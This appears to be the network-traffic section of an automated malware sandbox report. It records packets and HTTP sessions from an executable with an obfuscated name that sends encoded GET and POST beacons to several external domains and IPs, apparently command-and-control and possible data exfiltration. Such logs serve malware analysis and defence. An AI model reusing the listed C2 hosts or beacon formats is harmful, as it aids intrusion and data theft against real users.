                                          May 27, 2024 12:45:08.136044025 CEST4975180192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:08.140995026 CEST8049751199.59.243.225192.168.2.5
                                          May 27, 2024 12:45:13.269985914 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:13.274966002 CEST8049752173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:13.275121927 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:13.277862072 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:13.282744884 CEST8049752173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:13.943128109 CEST8049752173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:13.943249941 CEST8049752173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:13.943393946 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:14.787070990 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:15.805562973 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:15.810630083 CEST8049753173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:15.810758114 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:15.812705040 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:15.820086956 CEST8049753173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:16.509840965 CEST8049753173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:16.509999990 CEST8049753173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:16.510049105 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:17.395960093 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:18.960252047 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:18.965611935 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:18.965706110 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:18.968502045 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:18.974153042 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:18.974292994 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:19.702219009 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:19.702758074 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:19.702841997 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:20.475991964 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:21.497682095 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:21.502696037 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:21.502795935 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:21.505393982 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:21.510354996 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:22.210407019 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:22.215008974 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:22.217986107 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:22.220412016 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:22.225297928 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:27.933923006 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:27.939224005 CEST804975665.181.132.158192.168.2.5
                                          May 27, 2024 12:45:27.939369917 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:27.941920996 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:27.947210073 CEST804975665.181.132.158192.168.2.5
                                          May 27, 2024 12:45:28.924792051 CEST804975665.181.132.158192.168.2.5
                                          May 27, 2024 12:45:28.925163984 CEST804975665.181.132.158192.168.2.5
                                          May 27, 2024 12:45:28.925275087 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:29.443389893 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:30.467521906 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:30.472554922 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:30.474102974 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:30.478554964 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:30.483516932 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:31.993946075 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.142249107 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.142309904 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.142340899 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.142525911 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.142571926 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.142601967 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.142601967 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.142704964 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.143455029 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.144737005 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.144821882 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.144821882 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:33.008932114 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:33.014163971 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:33.014504910 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:33.016129971 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:33.021418095 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:33.021447897 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:34.526505947 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:34.834199905 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.064579010 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.064625025 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.064654112 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.064661026 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.064690113 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.064750910 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.064851046 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.064851046 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.068124056 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.068156958 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.068209887 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.068331957 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:36.185566902 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:36.191262007 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:36.191476107 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:36.194500923 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:36.200295925 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:37.161252975 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:37.161287069 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:37.161448002 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:37.164016008 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:37.174266100 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:42.222515106 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:42.227864027 CEST80497603.33.130.190192.168.2.5
                                          May 27, 2024 12:45:42.227948904 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:42.231117964 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:42.236053944 CEST80497603.33.130.190192.168.2.5
                                          May 27, 2024 12:45:42.705410957 CEST80497603.33.130.190192.168.2.5
                                          May 27, 2024 12:45:42.705490112 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:43.741987944 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:43.749083996 CEST80497603.33.130.190192.168.2.5
                                          May 27, 2024 12:45:44.760143995 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:44.897576094 CEST80497613.33.130.190192.168.2.5
                                          May 27, 2024 12:45:44.898132086 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:44.901004076 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:44.906128883 CEST80497613.33.130.190192.168.2.5
                                          May 27, 2024 12:45:45.390659094 CEST80497613.33.130.190192.168.2.5
                                          May 27, 2024 12:45:45.393263102 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:46.412199974 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:46.417484999 CEST80497613.33.130.190192.168.2.5
                                          May 27, 2024 12:45:47.430751085 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:47.435952902 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:47.436101913 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:47.438002110 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:47.442970037 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:47.443284988 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:48.820445061 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:48.820522070 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:48.946007013 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:48.951170921 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:49.962188959 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:49.967194080 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:49.967268944 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:49.969013929 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:49.974174976 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:50.435273886 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:50.435583115 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:50.435642958 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:50.439548969 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:50.445059061 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:55.633162975 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:55.638134003 CEST804976451.195.44.77192.168.2.5
                                          May 27, 2024 12:45:55.638303041 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:55.639969110 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:55.644893885 CEST804976451.195.44.77192.168.2.5
                                          May 27, 2024 12:45:56.274019957 CEST804976451.195.44.77192.168.2.5
                                          May 27, 2024 12:45:56.274203062 CEST804976451.195.44.77192.168.2.5
                                          May 27, 2024 12:45:56.274267912 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:57.146553040 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:58.165324926 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:45:58.170592070 CEST804976551.195.44.77192.168.2.5
                                          May 27, 2024 12:45:58.170703888 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:45:58.172692060 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:45:58.177788973 CEST804976551.195.44.77192.168.2.5
                                          May 27, 2024 12:45:58.789990902 CEST804976551.195.44.77192.168.2.5
                                          May 27, 2024 12:45:58.790128946 CEST804976551.195.44.77192.168.2.5
                                          May 27, 2024 12:45:58.790194988 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:45:59.682053089 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:46:00.700767040 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:00.705725908 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:00.705795050 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:00.708856106 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:00.714549065 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:00.714675903 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:01.379152060 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:01.379199028 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:01.379281998 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:02.225022078 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.246159077 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.251466990 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:03.254229069 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.256364107 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.261559010 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:03.895646095 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:03.895680904 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:03.895998001 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.898684978 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.904243946 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:09.053658962 CEST4976880192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:09.058723927 CEST8049768217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:09.058800936 CEST4976880192.168.2.5217.70.184.50
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.5 | 49714 | 199.59.243.225 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:42:49.943654060 CEST | 501 | OUT | GET /gasu/?4b34ht=gR1i3bbXa1XbyGNM6Bi8srl2p7nPwmhk9UC1j0Li0VIEHsGUlRc+GvhwvE9+CLKXaHrFrMfO+pZgQjhrKjiTkfzvVWHOu9j6JtqDJOExpSNaoLQHX52jb9GcMlo+0mR5zw==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.double.gay
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:42:50.409034967 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:42:49 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1494
                                          x-request-id: e2009326-b285-4c4d-a45d-b3e33f260433
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wbcXhy5697iqBuGaRqQFffqjQ6QBgoVryZy3irt5MM/IryA/C/Q4vJBgscXL7HRa+/gwW1/Wbn2KJklSfvAZ7A==
                                          set-cookie: parking_session=e2009326-b285-4c4d-a45d-b3e33f260433; expires=Mon, 27 May 2024 10:57:50 GMT; path=/
                                          connection: close


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          1 | 192.168.2.5 | 49715 | 103.138.88.50 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:06.346940041 CEST | 777 | OUT | POST /iqzp/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.duhocvietanh.edu.vn
                                          Origin: http://www.duhocvietanh.edu.vn
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.duhocvietanh.edu.vn/iqzp/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          2 | 192.168.2.5 | 49717 | 103.138.88.50 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:08.877310038 CEST | 797 | OUT | POST /iqzp/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.duhocvietanh.edu.vn
                                          Origin: http://www.duhocvietanh.edu.vn
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.duhocvietanh.edu.vn/iqzp/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:10.352641106 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Connection: close
                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          cache-control: no-cache, must-revalidate, max-age=0
                                          content-type: text/html; charset=UTF-8
                                          link: <https://duhocvietanh.edu.vn/wp-json/>; rel="https://api.w.org/"
                                          content-length: 10950
                                          content-encoding: br
                                          vary: Accept-Encoding,User-Agent,Accept-Encoding
                                          date: Mon, 27 May 2024 10:43:06 GMT
                                          server: LiteSpeed


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          3 | 192.168.2.5 | 49718 | 103.138.88.50 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:11.408840895 CEST | 1814 | OUT | POST /iqzp/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.duhocvietanh.edu.vn
                                          Origin: http://www.duhocvietanh.edu.vn
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.duhocvietanh.edu.vn/iqzp/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:12.829499960 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Connection: close
                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          cache-control: no-cache, must-revalidate, max-age=0
                                          content-type: text/html; charset=UTF-8
                                          link: <https://duhocvietanh.edu.vn/wp-json/>; rel="https://api.w.org/"
                                          content-length: 10950
                                          content-encoding: br
                                          vary: Accept-Encoding,User-Agent,Accept-Encoding
                                          date: Mon, 27 May 2024 10:43:08 GMT
                                          server: LiteSpeed


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          4 | 192.168.2.5 | 49719 | 103.138.88.50 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:13.994642019 CEST | 510 | OUT | GET /iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwAxJrjpsvX+qRkMbJbRaZT89LHtus1xeGcvR3FY7l2IYkKTCFrV4doYlBH8GHezxeD3NhTg==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.duhocvietanh.edu.vn
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:15.274095058 CEST | 524 | IN | HTTP/1.1 301 Moved Permanently
                                          Connection: close
                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          cache-control: no-cache, must-revalidate, max-age=0
                                          content-type: text/html; charset=UTF-8
                                          x-redirect-by: WordPress
                                          location: http://duhocvietanh.edu.vn/iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwAxJrjpsvX+qRkMbJbRaZT89LHtus1xeGcvR3FY7l2IYkKTCFrV4doYlBH8GHezxeD3NhTg==&UxF=2Nflznk0WJ3hjv
                                          content-length: 0
                                          date: Mon, 27 May 2024 10:43:10 GMT
                                          server: LiteSpeed
                                          vary: User-Agent,Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          5 | 192.168.2.5 | 49720 | 216.40.34.41 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:21.455991030 CEST | 756 | OUT | POST /wouf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.botcsllc.com
                                          Origin: http://www.botcsllc.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.botcsllc.com/wouf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=aTgNlw6AlVm3gKnIo7w8M5eQ5rBo0JZGIBWfJZZFCHks2Am5Pa218c9eRbQ1qeNQ0hpZsBg/RfsmGUD1JE+bRulm3nG1O/HXMN/eloD2w9C5xEQaTOZsthXOeznwCjtSoIGqFumYnFE2jeOkSPSN2okallrZMDeK1xUsPeBw1y/I24fnnewwFPwFaHdcuab9SFQaVVk=
                                          May 27, 2024 12:43:21.972661972 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          content-type: text/html; charset=UTF-8
                                          x-request-id: 7ccaf680-076e-406e-9082-2d4f4500fffa
                                          x-runtime: 0.038115
                                          content-length: 18203
                                          connection: close
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          6 | 192.168.2.5 | 49721 | 216.40.34.41 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:23.986085892 CEST | 776 | OUT | POST /wouf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.botcsllc.com
                                          Origin: http://www.botcsllc.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.botcsllc.com/wouf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=aTgNlw6AlVm3ivvIvYY8dpeR2LBomJZCIBSfJdgdCxcs2g25Ob21/c9eZ7Qs3ONZ0hVvsDk/Rf4mGVz1I1+YX+le7HG3QPHXMN/elomjw8m5y0MaTvZvzRXNZznwGjtOoIGDFsCinG82jaKkS8KMj4lRrFqmJw+B7joHO/g3pT7T+uyN984YWvc9KUVr/q6UImAqLCwTeaYlycr5if10/ZKzob9g
                                          May 27, 2024 12:43:24.487472057 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          content-type: text/html; charset=UTF-8
                                          x-request-id: 43bd9ea3-1f62-449d-8baa-5a20ee528cd2
                                          x-runtime: 0.024217
                                          content-length: 18223
                                          connection: close
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          7 | 192.168.2.5 | 49722 | 216.40.34.41 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:26.515472889 CEST | 1793 | OUT | POST /wouf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.botcsllc.com
                                          Origin: http://www.botcsllc.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.botcsllc.com/wouf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
